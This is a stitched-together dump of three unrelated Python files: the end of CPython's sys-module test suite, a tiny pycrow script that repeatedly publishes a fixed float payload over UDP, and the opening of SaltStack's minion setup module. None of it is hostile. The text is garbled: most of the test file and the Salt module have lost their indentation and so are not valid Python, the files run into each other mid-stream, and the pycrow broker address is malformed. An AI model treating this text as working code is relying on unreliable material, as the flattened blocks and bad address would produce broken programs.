b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
@support.requires_subprocess()
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, test.support.swap_attr(
sys, 'unraisablehook', sys.__unraisablehook__
):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj"
)
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict (string key)
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('2P'))
longdict = {str(i): i for i in range(8)}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('2P'))
# dict (non-string key)
check({1: 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('6Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('6Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('6Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n4P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
def func():
return sys._getframe()
x = func()
check(x, size('3Pi3c7P2ic??2P'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2P4P4c7P2ic??P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
check(list([]), vsize('Pn'))
check(list([1]), vsize('Pn') + 2*self.P)
check(list([1, 2]), vsize('Pn') + 2*self.P)
check(list([1, 2, 3]), vsize('Pn') + 4*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIP'
s = vsize('2P' + fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P'
'1P' # Specializer cache
)
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("2P"))
# dict with shared keys
[newstyleclass() for _ in range(100)]
check(newstyleclass().__dict__, size('nQ2P') + self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 64 + 42*calcsize("2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnb"
compactfields = asciifields + "nP"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn3P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn3P'))
def check_slots(self, obj, base, extra):
    """Assert that sizeof(obj) == sizeof(base) + struct.calcsize(extra).

    When *obj* is GC-tracked but *base* is not, one GC header
    (self.gc_headsize) is added to the expectation.
    """
    gc_extra = self.gc_headsize if gc.is_tracked(obj) and not gc.is_tracked(base) else 0
    self.assertEqual(sys.getsizeof(obj),
                     sys.getsizeof(base) + struct.calcsize(extra) + gc_extra)
def test_slots(self):
    # check all subclassable types defined in Objects/ that allow
    # non-empty __slots__
    # Each subclass declares three slots, so its instances must be exactly
    # three pointers ('3P') larger than an equivalent base-type instance.
    check = self.check_slots
    class BA(bytearray):
        __slots__ = 'a', 'b', 'c'
    check(BA(), bytearray(), '3P')
    class D(dict):
        __slots__ = 'a', 'b', 'c'
    check(D(x=[]), {'x': []}, '3P')
    class L(list):
        __slots__ = 'a', 'b', 'c'
    check(L(), [], '3P')
    class S(set):
        __slots__ = 'a', 'b', 'c'
    check(S(), set(), '3P')
    class FS(frozenset):
        __slots__ = 'a', 'b', 'c'
    check(FS(), frozenset(), '3P')
    # OrderedDict is implemented in Objects/odictobject.c, hence included here.
    from collections import OrderedDict
    class OD(OrderedDict):
        __slots__ = 'a', 'b', 'c'
    check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
    # check all types defined in Python/
    size = test.support.calcobjsize
    vsize = test.support.calcvobjsize
    check = self.check_sizeof
    # _ast.AST
    import _ast
    check(_ast.AST(), size('P'))
    # Raise and catch an exception purely to obtain a live traceback object.
    try:
        raise TypeError
    except TypeError:
        tb = sys.exc_info()[2]
        # traceback
        if tb is not None:
            check(tb, size('2P2i'))
    # symtable entry
    # XXX
    # sys.flags
    # sys.flags is a struct sequence: var-size header plus one pointer
    # per flag field.
    check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
    # If the default displayhook doesn't take a strong reference
    # to sys.stderr the following code can crash. See bpo-43660
    # for more details.
    # The child program rebinds sys.stderr from inside a write() call on
    # the active stderr object, dropping the last reference mid-write.
    code = textwrap.dedent('''
        import sys
        class MyStderr:
            def write(self, s):
                sys.stderr = None
        sys.stderr = MyStderr()
        1/0
        ''')
    rc, out, err = assert_python_failure('-c', code)
    # The interpreter must exit with an error but without crashing and
    # without producing any output on either stream.
    self.assertEqual(out, b"")
    self.assertEqual(err, b"")
# Allow running this test file directly (outside the regrtest driver).
if __name__ == "__main__":
    unittest.main()
|
spammer.py | #!/usr/bin/env python3
#coding: utf-8
import sys
import time
import pycrow
import numpy
import threading
# Point the pycrow runtime at the central "crowker" broker and open a local
# UDP gate (gate id 12) on port 10009.
# NOTE(review): ".12.109.173.108.206:10009" starts with a dot and contains
# five octets -- this looks like a mangled host address; confirm the
# intended value before relying on this script.
pycrow.set_crowker(".12.109.173.108.206:10009")
pycrow.create_udpgate(12, 10009)

# Run the pycrow event loop in a background thread; the main thread below
# acts as the publisher.
thr = threading.Thread(target=pycrow.spin)
thr.start()

# The published payload never changes, so encode the two float32 values
# once instead of rebuilding the array and re-serializing it every second.
bts = numpy.array([256, 24]).astype(numpy.float32).tobytes()

while True:
    time.sleep(1)
    # Publish the constant 8-byte float32 payload on the "fltflt" theme.
    pycrow.publish("fltflt", bts)
minion.py | # -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import
from __future__ import print_function
import copy
import errno
import fnmatch
import hashlib
import logging
import multiprocessing
import os
import re
import salt
import signal
import sys
import threading
import time
import traceback
import types
from random import randint, shuffle
from salt.ext.six.moves import range
# Import third party libs
try:
import zmq
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
# Import salt libs
from salt.exceptions import (
AuthenticationError, CommandExecutionError, CommandNotFoundError,
SaltInvocationError, SaltReqTimeoutError, SaltClientError,
SaltSystemExit, SaltSyndicMasterError
)
import salt.client
import salt.crypt
import salt.loader
import salt.payload
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.schedule
import salt.utils.zeromq
import salt.defaults.exitcodes
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.ext.six import string_types
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
import salt.syspaths
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
    '''
    Resolves the master_ip and master_uri options

    Returns a dict with 'master_ip' (resolved address or '127.0.0.1' for
    purely local minions / unresolvable names without retry_dns) and
    'master_uri' (tcp:// URI built from master_ip and master_port).

    Raises SaltSystemExit (code 42) when the configured master address is
    syntactically invalid/unresolvable.
    '''
    ret = {}
    check_dns = True
    # A purely local minion (local file_client and no fallback to a master)
    # has no master address to resolve.
    if (opts.get('file_client', 'remote') == 'local' and
            not opts.get('use_master_when_local', False)):
        check_dns = False

    if check_dns is True:
        # Because I import salt.log below I need to re-import salt.utils here
        import salt.utils
        try:
            ret['master_ip'] = \
                salt.utils.dns_check(opts['master'], True, opts['ipv6'])
        except SaltClientError:
            # Name did not resolve. With retry_dns configured, retry forever
            # at that interval; otherwise fall back to localhost.
            if opts['retry_dns']:
                while True:
                    import salt.log
                    msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
                           'seconds').format(opts['master'], opts['retry_dns'])
                    if salt.log.is_console_configured():
                        log.error(msg)
                    else:
                        print('WARNING: {0}'.format(msg))
                    time.sleep(opts['retry_dns'])
                    try:
                        ret['master_ip'] = salt.utils.dns_check(
                            opts['master'], True, opts['ipv6']
                        )
                        break
                    except SaltClientError:
                        # Still unresolved; loop and retry again.
                        pass
            else:
                ret['master_ip'] = '127.0.0.1'
        except SaltSystemExit:
            err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format(
                opts.get('master', 'Unknown'))
            log.error(err)
            # Exit code 42 signals an unresolvable master address.
            raise SaltSystemExit(code=42, msg=err)
    else:
        ret['master_ip'] = '127.0.0.1'

    # Warn when the freshly resolved address differs from a previously
    # cached one in opts.
    if 'master_ip' in ret and 'master_ip' in opts:
        if ret['master_ip'] != opts['master_ip']:
            log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
                                                                           ret['master_ip'])
                        )
    ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
                                                   port=opts['master_port'])
    return ret
def get_proc_dir(cachedir):
    '''
    Given the cache directory, return the directory that process data is
    stored in, creating it if it doesn't exist.

    :param str cachedir: base cache directory (e.g. /var/cache/salt/minion)
    :return: path of the ``proc`` subdirectory
    '''
    fn_ = os.path.join(cachedir, 'proc')
    try:
        # EAFP: attempt creation unconditionally. The original
        # isdir()-then-makedirs() pair raced with concurrent creators
        # (another process creating the directory between the check and
        # the makedirs call would crash us with EEXIST).
        os.makedirs(fn_)
    except OSError as exc:
        # An already-existing *directory* is fine; a file in the way, or
        # any other error (permissions, read-only fs), is re-raised.
        if exc.errno != errno.EEXIST or not os.path.isdir(fn_):
            raise
    return fn_
def parse_args_and_kwargs(func, args, data=None):
    '''
    Wrap load_args_and_kwargs

    Deprecated alias kept for backwards compatibility: emits a Boron-cycle
    deprecation warning and delegates unchanged to load_args_and_kwargs().
    '''
    salt.utils.warn_until(
        'Boron',
        'salt.minion.parse_args_and_kwargs() has been renamed to '
        'salt.minion.load_args_and_kwargs(). Please change this function call '
        'before the Boron release of Salt.'
    )
    return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None):
    '''
    Detect the args and kwargs that need to be passed to a function call, and
    check them against what was passed.

    :param func: the function object whose argspec is consulted
    :param args: mixed list of positional strings, 'key=value' strings and
                 ``{'__kwarg__': True, ...}`` dicts
    :param data: optional publish data; packed into kwargs as ``__pub_*``
                 keys when *func* accepts **kwargs
    :return: (_args, _kwargs) tuple ready for ``func(*_args, **_kwargs)``
    :raises SaltInvocationError: if any keyword argument is not accepted
                                 by *func*
    '''
    argspec = salt.utils.args.get_function_argspec(func)
    _args = []
    _kwargs = {}
    invalid_kwargs = []

    for arg in args:
        if isinstance(arg, string_types):
            # Re-parse the string to decide whether it is positional or a
            # 'key=value' style keyword argument.
            string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False)  # pylint: disable=W0632
            if string_arg:
                # Don't append the version that was just derived from parse_cli
                # above, that would result in a 2nd call to
                # salt.utils.cli.yamlify_arg(), which could mangle the input.
                _args.append(arg)
            elif string_kwarg:
                salt.utils.warn_until(
                    'Boron',
                    'The list of function args and kwargs should be parsed '
                    'by salt.utils.args.parse_input() before calling '
                    'salt.minion.load_args_and_kwargs().'
                )
                # NOTE: parse_input() on a single string yields a
                # single-key dict here, hence the next(iter(...)) check.
                if argspec.keywords or next(iter(string_kwarg.keys())) in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs.update(string_kwarg)
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}'.format(arg))
                continue

        # if the arg is a dict with __kwarg__ == True, then its a kwarg
        elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
            for key, val in arg.items():
                if argspec.keywords or key in argspec.args:
                    # Function supports **kwargs or is a positional argument to
                    # the function.
                    _kwargs[key] = val
                else:
                    # **kwargs not in argspec and parsed argument name not in
                    # list of positional arguments. This keyword argument is
                    # invalid.
                    invalid_kwargs.append('{0}'.format(arg))
            continue

        else:
            _args.append(arg)

    if invalid_kwargs:
        raise SaltInvocationError(
            'The following keyword arguments are not valid: {0}'
            .format(', '.join(invalid_kwargs))
        )

    if argspec.keywords and isinstance(data, dict):
        # this function accepts **kwargs, pack in the publish data
        for key, val in data.items():
            _kwargs['__pub_{0}'.format(key)] = val

    return _args, _kwargs
class SMinion(object):
    '''
    Create an object that has loaded all of the minion module functions,
    grains, modules, returners etc. The SMinion allows developers to
    generate all of the salt minion functions and present them with these
    functions for general use.
    '''
    def __init__(self, opts):
        # Late setup of the opts grains, so we can log from the grains module
        opts['grains'] = salt.loader.grains(opts)
        self.opts = opts

        # Clean out the proc directory (default /var/cache/salt/minion/proc)
        # NOTE(review): the comment above looks stale -- nothing below
        # touches the proc directory; this branch resolves the master(s)
        # and loads the modules.
        if (self.opts.get('file_client', 'remote') == 'remote'
                or self.opts.get('use_master_when_local', False)):
            if isinstance(self.opts['master'], list):
                masters = self.opts['master']
                if self.opts['random_master'] is True:
                    shuffle(masters)
                # Try each master in turn; the first one we can
                # authenticate to wins.
                for master in masters:
                    self.opts['master'] = master
                    self.opts.update(resolve_dns(opts))
                    try:
                        self.gen_modules()
                        break
                    except SaltClientError:
                        log.warning(('Attempted to authenticate with master '
                                     '{0} and failed'.format(master)))
                        continue
            else:
                if self.opts['random_master'] is True:
                    log.warning('random_master is True but there is only one master specified. Ignoring.')
                self.opts.update(resolve_dns(opts))
                self.gen_modules(initial_load=True)
        else:
            # Purely local operation: no master resolution needed.
            self.gen_modules(initial_load=True)

    def gen_modules(self, initial_load=False):
        '''
        Load all of the modules for the minion

        Compiles pillar first, then loads execution modules, returners,
        states, renderers and the matcher, and exposes itself as
        ``sys.reload_modules``.
        '''
        self.opts['pillar'] = salt.pillar.get_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment'],
        ).compile_pillar()
        self.functions = salt.loader.minion_mods(self.opts, include_errors=True)
        self.function_errors = self.functions['_errors']
        self.functions.pop('_errors')  # Keep the funcs clean
        self.returners = salt.loader.returners(self.opts, self.functions)
        self.states = salt.loader.states(self.opts, self.functions)
        self.rend = salt.loader.render(self.opts, self.functions)
        self.matcher = Matcher(self.opts, self.functions)
        # Allow a live reload of all modules through the loaded function set.
        self.functions['sys.reload_modules'] = self.gen_modules
class MinionBase(object):
    '''
    Shared base for minion flavors: holds opts and owns the local (minion
    side) ZeroMQ event pub/pull socket pair.
    '''
    def __init__(self, opts):
        self.opts = opts

    def _init_context_and_poller(self):
        # One ZMQ context and poller per minion process.
        self.context = zmq.Context()
        self.poller = zmq.Poller()

    def _prepare_minion_event_system(self):
        # Prepare the minion event system
        #
        # Start with the publish socket
        self._init_context_and_poller()

        # Hash the minion id so the socket filename is safe and uniform.
        hash_type = getattr(hashlib, self.opts.get('hash_type', 'md5'))
        # Only use the first 10 chars to keep longer hashes from exceeding the
        # max socket path length.
        id_hash = hash_type(self.opts['id']).hexdigest()[:10]
        epub_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pub.ipc'.format(id_hash)
        )
        # Remove stale socket files from a previous run before binding.
        if os.path.exists(epub_sock_path):
            os.unlink(epub_sock_path)
        epull_sock_path = os.path.join(
            self.opts['sock_dir'],
            'minion_event_{0}_pull.ipc'.format(id_hash)
        )
        if os.path.exists(epull_sock_path):
            os.unlink(epull_sock_path)

        self.epub_sock = self.context.socket(zmq.PUB)

        # ipc_mode 'tcp' uses loopback TCP ports instead of unix sockets
        # (needed on platforms without IPC socket support).
        if self.opts.get('ipc_mode', '') == 'tcp':
            epub_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pub_port']
            )
            epull_uri = 'tcp://127.0.0.1:{0}'.format(
                self.opts['tcp_pull_port']
            )
        else:
            epub_uri = 'ipc://{0}'.format(epub_sock_path)
            salt.utils.zeromq.check_ipc_path_max_len(epub_uri)
            epull_uri = 'ipc://{0}'.format(epull_sock_path)
            salt.utils.zeromq.check_ipc_path_max_len(epull_uri)

        log.debug(
            '{0} PUB socket URI: {1}'.format(
                self.__class__.__name__, epub_uri
            )
        )
        log.debug(
            '{0} PULL socket URI: {1}'.format(
                self.__class__.__name__, epull_uri
            )
        )

        # Check to make sure the sock_dir is available, create if not
        default_minion_sock_dir = os.path.join(
